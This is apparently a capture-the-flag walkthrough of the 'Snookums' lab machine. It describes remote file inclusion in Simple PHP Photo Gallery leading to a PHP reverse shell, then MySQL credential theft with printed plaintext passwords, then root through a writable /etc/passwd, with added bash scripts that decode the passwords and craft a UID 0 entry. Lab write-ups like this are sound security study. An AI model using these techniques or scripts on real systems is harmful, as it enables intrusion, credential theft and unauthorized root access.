🐧Snookums
Last updated
Port 80 serves index.php for Simple PHP Photo Gallery. The footer of the page shows the version as v0.8.
Running dirsearch.py against the target website produces the following directories:
After manual inspection none of the directories are of particular interest. Searching for public exploits turns up a remote file inclusion (RFI) exploit for v0.7, which is worth trying against v0.8 as well.
As per the exploit page, the PoC for this is:
Browsing to image.php shows the following:
From here we can test for RFI by starting a Python SimpleHTTPServer on our attacking machine and including a test.txt file that contains the text 'hello'. If 'hello' appears in the response from image.php, the target fetched our file and rendered it.
As the include works and we know the target runs PHP, we can include a PHP reverse shell instead of the marker file. I hosted a PHP reverse shell configured to connect back to a listener on port 21, started the listener, and then browsed to it at:
Which resulted in a shell.
Browsing /var/www/html shows a db.php file. Reading it gives us login credentials for MySQL.
Once logged into MySQL locally we can see a database called 'SimplePHPGal'. Selecting it and showing its tables reveals a 'users' table; selecting all columns from it gives us usernames and base64 values.
These values are base64-encoded twice, so they need to be decoded twice to reveal the plaintext passwords:
josh : MobilizeHissSeedtime747
michael : HockSydneyCertify123
serena : OverallCrestLean000
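Decoding the two base64 layers for every row at once, as an added example that is not part of the original writeup. The encoded rows below are constructed here by re-encoding the writeup's plaintext passwords twice, not the real column dump; the `username,password` column names in the comment are an assumption about the SimplePHPGal schema.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): recover plaintext passwords
# from the double base64-encoded values in the SimplePHPGal users table.
set -eu

# Decode exactly two base64 layers.  Returns non-zero instead of emitting
# binary junk if either layer is not valid base64.
decode_twice() {
  local once
  once=$(printf '%s' "$1" | base64 -d 2>/dev/null) || return 1
  printf '%s' "$once" | base64 -d 2>/dev/null
}

# Sanity check: a real password is printable text.  Note that a 20-character
# string of letters and digits (HockSydneyCertify123) is also *syntactically*
# valid base64, so never "decode until it stops looking like base64"; decode
# the known number of layers and then check the result.
is_printable() {
  printf '%s' "$1" | LC_ALL=C grep -Eq '^[[:print:]]+$'
}

# Convert "username encoded" rows (the shape you get from
#   mysql -N -e 'select username,password from users' SimplePHPGal
# assuming those column names) into user:password pairs for ssh or hydra.
# Rows that do not decode cleanly are reported on stderr and skipped.
rows_to_creds() {
  local user enc pw
  while read -r user enc; do
    [ -n "$user" ] || continue
    if pw=$(decode_twice "$enc") && is_printable "$pw"; then
      printf '%s:%s\n' "$user" "$pw"
    else
      printf 'skip %s: not double-base64 text\n' "$user" >&2
    fi
  done
}

# Helper used only to build the constructed sample below: the same two-layer
# encoding the gallery stored (as described in the writeup).
encode_twice() {
  printf '%s' "$1" | base64 | tr -d '\n' | base64 | tr -d '\n'
}

# Constructed sample rows: the writeup's usernames and plaintext passwords,
# re-encoded here, plus one deliberately broken row.
sample_rows() {
  printf 'josh %s\n'    "$(encode_twice MobilizeHissSeedtime747)"
  printf 'michael %s\n' "$(encode_twice HockSydneyCertify123)"
  printf 'serena %s\n'  "$(encode_twice OverallCrestLean000)"
  printf 'bogus notbase64!!\n'
}

if [ "${CREDS_DEMO:-0}" = 1 ]; then
  sample_rows | rows_to_creds
fi
```

Run with `CREDS_DEMO=1` to see the three user:password lines; on the box, pipe the real query output into `rows_to_creds` instead of `sample_rows`.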
Viewing /etc/passwd shows two non-default users, michael and GitRekt.
We can then attempt to SSH in as michael with the password recovered from the database, in case it has been reused.
LinPEAS reports that /etc/passwd is writable by our user. Because login and su accept a password hash placed directly in the second field of /etc/passwd (the usual 'x' there just defers to /etc/shadow), we can append a new user with UID 0 and a hash we generate ourselves.
Generate a password hash on the attacking machine:
Append the new user line, including the hash, to the end of /etc/passwd on the target:
su to the new user; id should then report uid=0:
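The three steps above as one script, added here as an example rather than the writeup's own commands. The username `rootme`, the salt `xyz` and the password `Password1!` are assumptions; the hash is generated with `openssl passwd` on the attacking machine and the resulting line is validated before it is appended on the target.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): turn a writable /etc/passwd
# into a root shell.  Username, salt and password are assumptions; change them.
set -eu

# MD5-crypt ($1$) hash, accepted by every glibc-based login/su.  A fixed salt
# keeps the output reproducible.  On targets with a modern glibc,
# "openssl passwd -6" (sha512crypt) is the stronger choice.
gen_hash() {
  local password="$1" salt="${2:-xyz}"
  openssl passwd -1 -salt "$salt" "$password"
}

# Build a complete 7-field passwd line with UID 0 and GID 0.  Putting the
# hash in field 2 works because login/su only consult /etc/shadow when that
# field is "x"; no shadow entry is needed for the new user.
passwd_entry() {
  local user="$1" hash="$2"
  printf '%s:%s:0:0:root:/root:/bin/bash\n' "$user" "$hash"
}

# Refuse a malformed line: a stray ':' (for example from a hash that was
# pasted wrongly) shifts every field and can lock everyone out of the box.
validate_entry() {
  local line="$1"
  case "$line" in *:*:*:*:*:*:*) ;; *) return 1 ;; esac
  [ "$(printf '%s' "$line" | tr -cd ':' | wc -c)" -eq 6 ]
}

# On the target, with the hash copied over:
#   cp /etc/passwd /tmp/passwd.bak          # keep a copy to restore
#   passwd_entry rootme "$HASH" >> /etc/passwd
#   su rootme                               # enter the plaintext password
#   id                                      # uid=0(root): same UID as root
if [ "${PASSWD_DEMO:-0}" = 1 ]; then
  hash=$(gen_hash 'Password1!' xyz)
  entry=$(passwd_entry rootme "$hash")
  validate_entry "$entry" && printf '%s' "$entry"
fi
```

Because the new account shares UID 0 with root, `id` resolves it to `root`; remove the appended line (or restore the backup) when you are done so the box is left as you found it.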